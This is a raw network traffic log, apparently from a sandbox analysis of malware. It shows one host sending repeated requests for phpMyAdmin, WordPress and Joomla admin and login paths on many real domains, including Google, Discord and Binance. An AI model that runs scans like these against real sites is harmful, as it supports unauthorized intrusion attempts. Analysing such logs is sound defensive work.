                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.155567884 CET933INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://discord.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wwQ0g6Z%2BPKJxStwA0m3P2dlUjH9cixSFmIJZFVbfjlPiD7AA7BgzIz38yIiUY8dtTqiEJj2RgYtkjXpQCIYXeEDDeQbNQ%2BgLact6DScGiBhIfvh4b5vyejSwT5kR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; path=/; domain=.discord.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000; path=/; domain=.discord.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd4839ffb133-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.463277102 CET362OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://discord.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.588116884 CET691INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://discord.com/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SmmUDE%2BqEeq4P1oCREyUryhMIBHTE9Mvl99Fgxjb2PogSm9LOEgC14RR7LMW7PyCFyqVlmRKWsW405%2Fqhd0JJPj6qqyUqakVmzqadLtNgQQE%2BNyMkfCQNodBf%2FO4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd5dbfcdb133-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                372192.168.2.66262664.190.63.11180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.032529116 CET170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: foros.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.244599104 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                373192.168.2.662925172.66.43.11780
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.072779894 CET167OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login.adf.ly
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.228473902 CET1286INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                location: https://login.adf.ly/admin
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oxoIm0HdwJ%2BX7MwgUQtKFItbFDuXlxx%2Fsx96eH0dYZ8fzpREroD7OpPx1rsEjl3wfaL0vA0Zi6UV3glRD6m5fKCAnMyMvB0H2OjdJXdOuXSR4YjHTXqXWApxpX5gW6g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd488fe24503-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 32 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 32 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2ab<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.228610992 CET126INData Raw: 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 74 65 6d 70 6f 72 61 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.228626013 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                374192.168.2.662931104.21.60.18880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.078630924 CET166OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: netizion.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.228451967 CET664INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://netizion.com/pma/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Zzy%2B8qmroyl5umI6FHJH2sS0iHKj28oQ9UcbTnpgVnuj4CEiTgzAPkCv%2B9F0x%2FGCzsCsXKMYyGDCV0CpvcnJFfIEAAPVahuXoOT7VMTPzOslNnFpUbiW%2BELzI%2Fho%2FVE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd489aaf6777-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                375192.168.2.66277334.250.93.11280
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.078690052 CET168OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: kwyk.fr
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.280987978 CET409INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 194
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.kwyk.fr/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                376192.168.2.6629483.161.136.280
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.081423044 CET181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.binance.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.182934999 CET581INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.binance.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 22faf6fcae096ee97264521770b65762.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P4
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: uSQt9a441ccESUXVAmejpyKGzy-FBx8kIxTqixjsV24HW7TkkYmqYg==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                377192.168.2.662947142.250.105.8480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.081446886 CET180OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.212615967 CET485INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.212786913 CET184INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef a6 bd 96 18 48 6b ac 05 c5 22 39 b4 47 89 8b 11 8c 11 8d 05 ff be 31 ed b1 73 59 76 76 18 de d2 5c 96 05 8b 68 2e 78 ea 87 bc cb 42 b0 d2 be a1 45 12 cc 64 e7 66 ee 87 8d 92 ef
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHHk"9G1sYvv\h.xBEdf!T]n xJ{Hj@U!,(E`i VffX2|


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                378192.168.2.6629383.141.96.5380
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.088480949 CET186OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: money-farm.cc
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.212960005 CET161INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                location: https://money-farm.cc/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                379192.168.2.66294420.231.114.2480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.092833996 CET179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.mojang.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.209356070 CET351INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.minecraft.net/
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                380192.168.2.66294544.199.96.17980
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.092910051 CET183OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.210130930 CET402INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 185
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Location: https://pxndx-mcr.boletia.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.2</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.464705944 CET233OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://pxndx-mcr.boletia.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.584340096 CET399INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 185
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Location: https://pxndx-mcr.boletia.com/wp-admin/
